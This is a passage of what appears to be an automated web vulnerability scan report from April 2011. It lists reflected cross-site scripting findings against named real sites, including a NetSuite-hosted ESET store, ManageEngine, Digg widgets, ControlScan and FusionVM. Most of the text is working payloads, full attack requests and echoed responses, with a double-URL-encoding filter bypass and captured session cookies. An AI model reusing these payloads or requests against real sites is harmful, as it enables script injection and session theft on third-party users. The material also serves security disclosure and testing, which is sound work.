P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 3991
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
</script>b5145<script>alert(1)</script>f50696de753.</span>
...[SNIP]...
6.41. http://shopping.netsuite.com/s.nl [alias parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shopping.netsuite.com
Path:   /s.nl

Issue detail

The value of the alias request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 44891'style%3d'x%3aexpression(alert(1))'9a7dd871708 was submitted in the alias parameter. This input was echoed as 44891'style='x:expression(alert(1))'9a7dd871708 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /s.nl?alias=44891'style%3d'x%3aexpression(alert(1))'9a7dd871708&c=438708&n=1&whence= HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmc=1; __utmb=1.2.10.1303741547; bn_u=6923519460848807096; mbox=session#1303736347554-914602#1303744342|PC#1303736347554-914602.17#1366814482|check#true#1303742542

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:15:54 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 233571352:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 55003


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>


<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
<input type='hidden' name='referer' value='http://shopping.netsuite.com/44891'style='x:expression(alert(1))'9a7dd871708?whence=&c=438708&n=1'>
...[SNIP]...
6.42. http://shopping.netsuite.com/s.nl [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shopping.netsuite.com
Path:   /s.nl

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4d64d'style%3d'x%3aexpression(alert(1))'889d2fade51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4d64d'style='x:expression(alert(1))'889d2fade51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /s.nl?alias=&c=438708&n=1&whence=&4d64d'style%3d'x%3aexpression(alert(1))'889d2fade51=1 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmc=1; __utmb=1.2.10.1303741547; bn_u=6923519460848807096; mbox=session#1303736347554-914602#1303744342|PC#1303736347554-914602.17#1366814482|check#true#1303742542

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:36:23 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 2009315293:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 54826


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>


<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
<input type='hidden' name='referer' value='http://shopping.netsuite.com/?whence=&4d64d'style='x:expression(alert(1))'889d2fade51=1&c=438708&n=1'>
...[SNIP]...
6.43. http://shopping.netsuite.com/s.nl [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shopping.netsuite.com
Path:   /s.nl

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6483e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527be136aaa48c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6483e'style='x:expression(alert(1))'be136aaa48c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /s.nl?c=438708&n=1&sc=3&ext=T&promocode=&qtyadd=1&mboxSession=1303736347554-914602&Submit.x=43&productId=1650&Submit.y=8&whence=&6483e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527be136aaa48c=1 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=dYyfN1wHZN71TmqdTHVPc5rfpmdrpWWkqQGJBTWHYGvFy6PP4kwCF9spppQp2p6T1y9LcTBvdSVRJT4zdGg0FbSwpQwRl5vyB94JHShTwbxX21bQLM8ycnhGDnyFQxbh!-2139436563; NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; NLPromocode=438708_; promocode=; NS_VER=2011.1.0

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:20:44 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1564875036:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 54762


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>


<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
<input type='hidden' name='referer' value='http://shopping.netsuite.com/s.nl?c=438708&sc=3&6483e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527be136aaa48c=1&whence=&6483e'style='x:expression(alert(1))'be136aaa48c=1&6483e%27style%3d%27x%3aexpression%28alert%281%29%29%27be136aaa48c=1&qtyadd=1&n=1&mboxSession=1303736347554-914602&ext=T&Submit.x=43&productId=1650&Submit.y=8'>
...[SNIP]...
6.44. http://shopping.netsuite.com/s.nl/c.438708/n.1/sc.3/.f [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shopping.netsuite.com
Path:   /s.nl/c.438708/n.1/sc.3/.f

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7c1c0'style%3d'x%3aexpression(alert(1))'009af4d5fc7 was submitted in the REST URL parameter 2. This input was echoed as 7c1c0'style='x:expression(alert(1))'009af4d5fc7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /s.nl/c.4387087c1c0'style%3d'x%3aexpression(alert(1))'009af4d5fc7/n.1/sc.3/.f?ck=rcHW8415AciYvvMS&vid=rcHW8415AZeYvnmq&cktime=96655&cart=3606740&promocode=&dontcookiepromocode=T&chrole=17&ext=T HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmb=1.1.10.1303741547; __utmc=1; mbox=check#true#1303741628|session#1303736347554-914602#1303743428|PC#1303736347554-914602.17#1304951168

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:52:11 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1139567357:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 54807


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>


<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
<input type='hidden' name='referer' value='http://shopping.netsuite.com/s.nl?c=4387087c1c0'style='x:expression(alert(1))'009af4d5fc7&sc=3&n=1&ext=T'>
...[SNIP]...
6.45. http://shopping.netsuite.com/s.nl/c.438708/n.1/sc.3/.f [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shopping.netsuite.com
Path:   /s.nl/c.438708/n.1/sc.3/.f

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bff16%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272d37b9cdc0d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bff16'style='x:expression(alert(1))'2d37b9cdc0d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /s.nl/c.438708/n.1/sc.3/.f?ck=rcHW8415AciYvvMS&vid=rcHW8415AZeYvnmq&cktime=96655&cart=3606740&promocode=&dontcookiepromocode=T&chrole=17&ext=T&bff16%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272d37b9cdc0d=1 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmb=1.1.10.1303741547; __utmc=1; mbox=check#true#1303741628|session#1303736347554-914602#1303743428|PC#1303736347554-914602.17#1304951168

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:45:46 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1121575945:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 49710


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>


<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
rt%25281%2529%2529%25272d37b9cdc0d=1&bff16%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272d37b9cdc0d=1&bff16%27style%3d%27x%3aexpression%28alert%281%29%29%272d37b9cdc0d=1&n=1&ext=T&bff16'style='x:expression(alert(1))'2d37b9cdc0d=1'>
...[SNIP]...
6.46. http://tools.manageengine.com/forums/security-manager/forum.php [char parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tools.manageengine.com
Path:   /forums/security-manager/forum.php

Issue detail

The value of the char request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 78007%3balert(1)//2b991119c48 was submitted in the char parameter. This input was echoed as 78007;alert(1)//2b991119c48 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /forums/security-manager/forum.php?limit=5&char=2578007%3balert(1)//2b991119c48 HTTP/1.1
Host: tools.manageengine.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/security-manager-forum.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.4.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:12:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64452

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style>
body
{
}
.forumTitle{float:left; margin-top:-12px; padding-left:10px; font:11px Verdana, Arial, Helvetica, sans-serif;color:#000;line-height:
...[SNIP]...
<a class=\"forumTitle\" target=\"_blank\" href='http://forums.manageengine.com/#Topic/"+rem[i].tpid+"'>"+forumtitle.substring(0,2578007;alert(1)//2b991119c48)+"...</a>
...[SNIP]...
6.47. http://widgets.digg.com/buttons/count [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload b0826<script>alert(1)</script>044029140f9 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=file%3A///C%3A/cdn/2011/04/25/dork/reflected-xss-cross-site-scripting-cwe-79-capec-86-ghdb-stillsecurecom.htmlb0826<script>alert(1)</script>044029140f9 HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Date: Mon, 25 Apr 2011 12:10:55 GMT
Via: NS-CACHE: 100
Etag: "3112ca90777458234aafe3bc78669cb02bb4b372"
Content-Length: 191
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Mon, 25 Apr 2011 12:20:54 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "file:///C:/cdn/2011/04/25/dork/reflected-xss-cross-site-scripting-cwe-79-capec-86-ghdb-stillsecurecom.htmlb0826<script>alert(1)</script>044029140f9", "diggs": 0});
6.48. https://www.controlscan.com/save_order.php [company parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.controlscan.com
Path:   /save_order.php

Issue detail

The value of the company request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c8d1'%3balert(1)//ee74115e8d1 was submitted in the company parameter. This input was echoed as 3c8d1';alert(1)//ee74115e8d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /save_order.php HTTP/1.1
Host: www.controlscan.com
Connection: keep-alive
Referer: https://www.controlscan.com/checkout.php
Cache-Control: max-age=0
Origin: https://www.controlscan.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=00f4el4lcuvnop42qop34mkqh4; __utmz=180386997.1303732833.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fpc1000725800122=O1TwOju5|4ybarsbLaa|fses1000725800122=|4ybarsbLaa|O1TwOju5|fvis1000725800122=Zj1odHRwcyUzQSUyRiUyRnd3dy5jb250cm9sc2Nhbi5jb20lMkYmYj1Db250cm9sU2NhbiUyMFBDSSUyMENvbXBsaWFuY2UlMjAlN0MlMjBHZXQlMjBQQ0klMjBDb21wbGlhbnQlMjBUb2RheSE=|8MYMHMsoss|8MYMHMsoss|8MYMHMsoss|8|8MYMHMsoss|8MYMHMsoss; __utma=180386997.730761609.1303732833.1303732833.1303735963.2; __utmc=180386997; __utmb=180386997.3.10.1303735963; com.vtrenz.iMAWebCookie=49379056-69d2-6147-26ad-65d29c6189eb; com.vtrenz.iMA.session=3cd51bd8-477e-ec0e-65cc-8ca3a9c2b5ac
Content-Length: 348

total=747.00&firstname=%27&lastname=%27&company=%27%273c8d1'%3balert(1)//ee74115e8d1&email=%27%40%3B.net&phone=111-222-3334&merchantID=&ipscan=10.0.1.1&cardfname=1&cardlname=1&address1=1&address2=1&city=dg&country=us&province=&state=AL&zipcode=09876&cardtype=MC&cardnumber=54636345635
...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:57:47 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="PHY DEM ONL STA PUR NAV COM OUR DELo CUR ADM DEV IDC COR BUS DSP"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26903

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<script type="text/javascript">
/*globals YWA*/
var YWATracker = YWA.getTracker("1000725800122");
YWATracker.setMemberId('''3c8d1';alert(1)//ee74115e8d1_');/*
YWATracker.setDocumentName("");
YWATracker.setDocumentGroup("");
*/
YWATracker.submit();
</script>
...[SNIP]...
6.49. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [_IG_CALLBACK parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fusionvm.com
Path:   /FusionVM/DesktopDefault.aspx

Issue detail

The value of the _IG_CALLBACK request parameter is copied into the HTML document as plain text between tags. The payload 5a188<script>alert(1)</script>e5eb79051f was submitted in the _IG_CALLBACK parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /FusionVM/DesktopDefault.aspx HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
Referer: https://www.fusionvm.com/FusionVM/DesktopDefault.aspx
Origin: https://www.fusionvm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQQASDQQ=MNOLHEFCGKBHGOHLANCBPEKB; CriticalWatch_WinMgmt=1ea476ea-f298-43b7-b986-76b4c2ad1a2b; ASP.NET_SessionId=ldofgy3miecclj01ixxgal4x; __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; __utmc=61526075; __utmb=61526075.1.10.1303736107
Content-Length: 5126

_IG_CSS_LINKS_=&ctl01xDesktopThreePanes1xThreePanesxctl05xAdvisoriesGrid=&ctl01$DesktopThreePanes1$ThreePanes$ctl01$SigninDBControl$password=&ctl01$DesktopThreePanes1$ThreePanes$ctl01$SigninDBControl$
...[SNIP]...
0alhcvIV7k7bu3g37AjmVa5J8yQOnBJBS8b%2Btlnypc31JyCiXOrCIh%2Fwf2BKBjw%3D%3D&__EVENTARGUMENT=&__EVENTTARGET=&_IG_CALLBACK=ctl01%24Banner%24UserSessionTimer1%24WebAsyncRefreshPanel1%23_0.084691817406564955a188<script>alert(1)</script>e5eb79051f

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Mon, 25 Apr 2011 12:57:37 GMT
Content-Length: 5375

/FusionVM/Images/FooterBackground2.gif/FusionVM/Images/CW-Logo-NoTag-Rev-MinSize.gif20112011.3.0.27<&>0ctl01$Banner$UserSessionTimer1$WebAsyncRefreshPanel1<&>0_0.084691817406564955a188<script>alert(1)</script>e5eb79051f<&>
...[SNIP]...
6.50. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [__EVENTVALIDATION parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fusionvm.com
Path:   /FusionVM/DesktopDefault.aspx

Issue detail

The value of the __EVENTVALIDATION request parameter is copied into the HTML document as plain text between tags. The payload 2417a<script>alert(1)</script>718a25325a7 was submitted in the __EVENTVALIDATION parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /FusionVM/DesktopDefault.aspx HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
Referer: https://www.fusionvm.com/FusionVM/DesktopDefault.aspx
Origin: https://www.fusionvm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQQASDQQ=MNOLHEFCGKBHGOHLANCBPEKB; CriticalWatch_WinMgmt=1ea476ea-f298-43b7-b986-76b4c2ad1a2b; ASP.NET_SessionId=ldofgy3miecclj01ixxgal4x; __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; __utmc=61526075; __utmb=61526075.1.10.1303736107
Content-Length: 5126

_IG_CSS_LINKS_=&ctl01xDesktopThreePanes1xThreePanesxctl05xAdvisoriesGrid=&ctl01$DesktopThreePanes1$ThreePanes$ctl01$SigninDBControl$password=&ctl01$DesktopThreePanes1$ThreePanes$ctl01$SigninDBControl$email=&__EVENTVALIDATION=%2FwEWBgKu2sn5AwLrz4T3CALMifq8DQLys6fMBwLn8K3zAwLxjbWVD6Xmq0l0NMQsglcvAmN0lT8Jos9NDGM8PnY%2Fy9C8ZIzR2417a<script>alert(1)</script>718a25325a7&__VIEWSTATE=1eNrdW81vG8cVFylRlkLHdGObTeOAmihObMX82CW5%2FFCsJJRkR4otRxUpOUgguMOdITnWcpfdnRXFHoqeeuyhKFK0hxZJPw5F0X%2BhQK9tcuihQE9tXfTj1KbfBXpI3%2BwuRVKSLVOioTAUwFnOvjf73vv95s3X6mNfKBQIxmRFTqdz8JcMhf2R
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Mon, 25 Apr 2011 12:56:31 GMT
Content-Length: 1716

<&>0ctl01$Banner$UserSessionTimer1$WebAsyncRefreshPanel1<&>0<error><&>0System.Web.HttpException (0x80004005): The state information is invalid for this page and might be corrupted. ---> System.Web.UI.
...[SNIP]...
ows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
